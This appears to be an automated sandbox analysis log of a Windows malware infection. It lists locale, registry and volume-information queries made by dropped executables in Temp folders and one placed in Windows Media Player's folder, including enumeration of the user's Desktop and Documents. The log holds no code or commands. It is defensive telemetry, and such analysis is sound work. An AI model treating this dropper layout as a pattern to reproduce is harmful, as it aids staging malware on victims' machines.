Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	9_2_00007FF643F841C8
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: GetLocaleInfoW,	9_2_00007FF643F84410
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: GetLocaleInfoW,	9_2_00007FF643F78D4C
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: EnumSystemLocalesW,	9_2_00007FF643F84060
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: EnumSystemLocalesW,	9_2_00007FF643F84130
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	9_2_00007FF643F83D04
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: GetLocaleInfoEx,FormatMessageA,	11_2_00007FF68459DF9C
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_00007FF6845C4568
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: GetLocaleInfoW,	11_2_00007FF6845C4618
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_00007FF6845C474C
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: EnumSystemLocalesW,	11_2_00007FF6845B8874
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_00007FF6845C41C8
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: GetLocaleInfoW,	11_2_00007FF6845C4410
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: GetLocaleInfoW,	11_2_00007FF6845B8D4C
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: EnumSystemLocalesW,	11_2_00007FF6845C4060
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: EnumSystemLocalesW,	11_2_00007FF6845C4130
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	11_2_00007FF6845C3D04
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: EnumSystemLocalesW,	12_2_00007FF711D632A0
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_00007FF711D6398C
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: EnumSystemLocalesW,	12_2_00007FF711D5A4A8
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_00007FF711D63408
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: EnumSystemLocalesW,	12_2_00007FF711D63370
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoW,	12_2_00007FF711D63650
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoW,	12_2_00007FF711D63858
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoW,	12_2_00007FF711D5A83C
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_00007FF711D637A8
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	12_2_00007FF711D62F44
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoEx,FormatMessageA,	12_2_00007FF711D4AF50
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: GetLocaleInfoEx,FormatMessageA,	13_2_00007FF61DD9DF9C
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: GetLocaleInfoW,	13_2_00007FF61DDB8D4C
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: EnumSystemLocalesW,	13_2_00007FF61DDC4130
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: EnumSystemLocalesW,	13_2_00007FF61DDC4060
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	13_2_00007FF61DDC3D04
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: GetLocaleInfoW,	13_2_00007FF61DDC4618
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_00007FF61DDC4568
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: EnumSystemLocalesW,	13_2_00007FF61DDB8874
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_00007FF61DDC474C
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	13_2_00007FF61DDC41C8
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: GetLocaleInfoW,	13_2_00007FF61DDC4410

Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014444001\1d09097be7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\audiodg.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\ucrtbase.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\_ctypes.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-console-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-datetime-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-heap-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-libraryloader-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-localization-l1-2-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-memory-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-rtlsupport-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-util-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-conio-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-math-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-process-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-stdio-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-time-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\libcrypto-1_1.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\libffi-7.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Queries volume information: C:\Users\user\Documents\My Videos VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Queries volume information: C:\ VolumeInformation

